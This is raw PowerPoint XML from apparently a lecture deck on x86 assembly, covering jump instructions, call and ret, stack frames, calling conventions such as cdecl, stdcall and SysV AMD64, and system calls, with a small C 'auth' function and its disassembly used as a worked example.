                      <a:endParaRPr sz="1800" i="1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Direct or indirect jump</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="42326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je/jz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ZF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Jump if equal</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="42326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jne/jnz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¬ZF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Jump if not equal</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="42326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jl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SF ⊕ OF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Jump if less (signed)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="42326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jle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(SF ⊕ OF) ∨ ZF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Jump if less or equal (signed)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="42326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jg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¬(SF ⊕ OF) ∧ ¬ZF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Jump if greater (signed)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="42326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jb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CF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Jump if below (unsigned)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="42326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ja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¬CF ∧ ¬ZF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Jump if above (unsigned)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="423267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 dirty="0" err="1">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>js</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1700" dirty="0">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t> x</a:t>
                      </a:r>
                      <a:endParaRPr sz="1700" dirty="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SF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Jump if negative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41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Procedures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Procedures (functions) are intrinsically linked to the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Provides space for local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Records where to return to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Used to pass arguments (sometimes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250" dirty="0"/>
              <a:t>Implemented using stack frames, or activation records</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234665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/>
              <a:t>Control Transfers (Calls)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="184" name="Table 184"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377450381"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2101629" y="1681083"/>
          <a:ext cx="7988740" cy="42326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63863"/>
                <a:gridCol w="2839597"/>
                <a:gridCol w="3585280"/>
              </a:tblGrid>
              <a:tr h="1058168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Instruction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Condition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Description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105816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call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esp ← esp - 4
Mem(esp) ← Succ(eip)
eip ← Addr(x)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Decrement esp by 4, store successor instruction address on stack, jump to operand address</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="105816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ret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eip ← Mem(esp)
esp ← esp + 4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>
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Pop successor address into eip, increment esp by 4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="35719" marR="35719" marT="35719" marB="35719" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="1058168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700">
                          <a:sym typeface="Menlo"/>
                        </a:rPr>
                        <a:t>ret x</a:t>
                      </a:r>
                      <a:endParaRPr sz="170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800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eip</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> ← Mem(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>)
</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> ← </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> + x + 4</a:t>
                      </a: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>
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>Pop successor address into </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>eip</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>, increment </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0" err="1">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t>esp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1800" dirty="0">
                          <a:sym typeface="Helvetica Light"/>
                        </a:rPr>
                        <a:t> by x + 4</a:t>
                      </a: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720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Memory Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11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45464" y="436278"/>
            <a:ext cx="4757941" cy="62185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4279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Frames</a:t>
            </a:r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5567802" y="1344057"/>
            <a:ext cx="4339569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40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06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auth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40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const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0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user)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40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size_t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i;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406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buf[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16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406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strncpy(buf, user, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="140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(buf));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buf[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="140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(buf) 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06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'\0'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40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for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(i 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 i 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0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(buf); i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++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buf[i] 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^=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0xe5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406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406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!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memcmp(buf, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1406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"secret"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406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</a:t>
            </a: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406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29</a:t>
            </a:fld>
            <a:endParaRPr sz="984"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19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629" y="1547138"/>
            <a:ext cx="2902149" cy="45005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6708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Correspondence between a (relatively) high-level language </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and the CPU’s Instruction Set Architecture (ISA)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CPU, memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Formats, classes, control flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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41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Frames</a:t>
            </a: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xfrm>
            <a:off x="5567802" y="1344057"/>
            <a:ext cx="4339569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_auth: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48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 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17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687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_strncpy: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30</a:t>
            </a:fld>
            <a:endParaRPr sz="984"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19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629" y="1547138"/>
            <a:ext cx="2902149" cy="450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icture 19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367637" y="2092947"/>
            <a:ext cx="495694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95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Frames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5567802" y="1344057"/>
            <a:ext cx="4339569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_auth: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48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 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17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687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_strncpy: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31</a:t>
            </a:fld>
            <a:endParaRPr sz="984"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20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629" y="1547138"/>
            <a:ext cx="2902149" cy="450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20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186778" y="3253418"/>
            <a:ext cx="495694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6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Frames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5567802" y="1344057"/>
            <a:ext cx="4339569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_auth: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48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 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17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687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_strncpy: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32</a:t>
            </a:fld>
            <a:endParaRPr sz="984"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="210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629" y="1547138"/>
            <a:ext cx="2902149" cy="450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icture 21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270747" y="3497697"/>
            <a:ext cx="495694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69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Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Shape 215"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567802" y="1344057"/>
            <a:ext cx="4339569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_auth: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48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 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17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687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_strncpy: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33</a:t>
            </a:fld>
            <a:endParaRPr sz="984"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21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629" y="1547138"/>
            <a:ext cx="2902149" cy="450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217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264691" y="3673586"/>
            <a:ext cx="495694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3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Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Shape 222"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567802" y="1344057"/>
            <a:ext cx="4339569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_auth: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48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 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17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687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_strncpy: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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Shape 2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34</a:t>
            </a:fld>
            <a:endParaRPr sz="984"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22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629" y="1547138"/>
            <a:ext cx="2902149" cy="450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icture 22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319955" y="3951692"/>
            <a:ext cx="495694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4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Frames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xfrm>
            <a:off x="5567802" y="1344057"/>
            <a:ext cx="4339569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_auth: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48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 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17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687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_strncpy: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35</a:t>
            </a:fld>
            <a:endParaRPr sz="984"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="231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629" y="1547138"/>
            <a:ext cx="2902149" cy="450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icture 23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270747" y="4183126"/>
            <a:ext cx="495694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4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Frames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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567802" y="1344057"/>
            <a:ext cx="4339569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_auth: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48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 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17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687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_strncpy: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36</a:t>
            </a:fld>
            <a:endParaRPr sz="984"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23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629" y="1547138"/>
            <a:ext cx="2902149" cy="450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icture 23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186778" y="4419574"/>
            <a:ext cx="495694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9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Frames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xfrm>
            <a:off x="5567802" y="1344057"/>
            <a:ext cx="4339569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_auth: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48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 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17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687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_strncpy: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37</a:t>
            </a:fld>
            <a:endParaRPr sz="984"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="245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629" y="1547138"/>
            <a:ext cx="2902149" cy="450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icture 245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186778" y="4632840"/>
            <a:ext cx="495694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5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Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Shape 250"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567802" y="1344057"/>
            <a:ext cx="4339569" cy="4906724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_auth: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48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 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17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687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_strncpy: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38</a:t>
            </a:fld>
            <a:endParaRPr sz="984"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25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4629" y="1547138"/>
            <a:ext cx="2902149" cy="4500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icture 25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270747" y="2319366"/>
            <a:ext cx="495694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52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Calling Conventions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Shape 2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Standards exist for procedures known as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" i="1"/>
              <a:t>calling conventions</a:t>
            </a:r>
            <a:endParaRPr sz="2250"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Specify where arguments are passed (registers, stack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Specify the caller and callee's responsibilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Who deallocates argument space on stack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Which registers can be clobbered by callee, who must save them?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Why do we need standards?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Interoperability – code compiled by different toolchains must work together</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362938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Deep Topic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="x86ref.pdf"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="2797" t="13745" r="2952" b="13790"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4925579" y="224061"/>
            <a:ext cx="6529001" cy="64962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871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Calling Conventions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Shape 2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We often speak of callers and callees</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Callers invoke a procedure – i.e., call site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Callees are invoked – i.e., call target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Conventions must specify how registers are dealt with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Could always save everything, but that's inefficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Usually, some registers can be overwritten by the callee (clobbered), others cannot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Registers that are clobbered are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" i="1"/>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> saved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Registers that must not be clobbered are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250" i="1"/>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t> saved</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113387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 smtClean="0"/>
              <a:t>Calling Conventions</a:t>
            </a:r>
            <a:endParaRPr sz="4500" dirty="0"/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2250" dirty="0" err="1" smtClean="0"/>
              <a:t>cdecl</a:t>
            </a:r>
            <a:endParaRPr sz="225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39788" y="2367751"/>
            <a:ext cx="5157787" cy="4384896"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1"/>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> is the Linux 32 bit calling convention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Arguments passed on the stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>right to left</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> (reverse order)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0"/>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> saved (i.e., can be clobbered)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Remaining registers are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0" err="1"/>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> saved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Return value in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Caller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1"/>
              <a:t>deallocates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> arguments on stack after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>return</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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stdcall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199" y="2367751"/>
            <a:ext cx="5672611" cy="4384896"/>
          </a:xfr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 err="1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stdcall_fn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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ebp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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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return and clean up arguments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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lang="en-US" sz="844" dirty="0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lang="en-US" sz="2250" dirty="0" err="1"/>
              <a:t>stdcall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> is used by the Win32 API, among others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Almost identical to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1"/>
              <a:t>cdecl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>However, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" i="1" dirty="0" err="1"/>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1"/>
              <a:t>deallocates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t> arguments on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0"/>
              <a:t>Can you think of a reason why this is better or worse than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1"/>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>?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2692713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SysV AMD64 ABI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Shape 2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x86_64 calling convention used on Linux, Solaris, FreeBSD, Mac OS X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>First six (integer) arguments passed in registers rdi, rsi, rdx, rcx, r8, r9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>(Except syscalls, where rcx → r10)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Additional arguments spill to stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2250"/>
              <a:t>Return value in rax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395409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SysV AMD64 ABI Example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476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auth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const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user)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size_t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16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user, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="200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// ...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000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C0BF22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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" err="1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auth</a:t>
            </a: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save previous frame pointer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set new frame pointer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0x30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allocate space for locals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movabs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sizeof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-0x20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get the address of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-0x08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user pointer into stack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-0x08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user pointer back into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into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_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call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strncpy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</a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253514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r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>Systems calls are special control flow transfers from program code to OS code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>Used to access OS-level APIs and devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>Accept parameters just like other procedures/functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1850" dirty="0" smtClean="0"/>
              <a:t>But the argument passing format is different</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1850" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t>Change protection-level from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" err="1" smtClean="0"/>
              <a:t>Userland</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2250" dirty="0" smtClean="0"/>
              <a:t> (Ring 3) to Kernel Mode (Ring 0)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
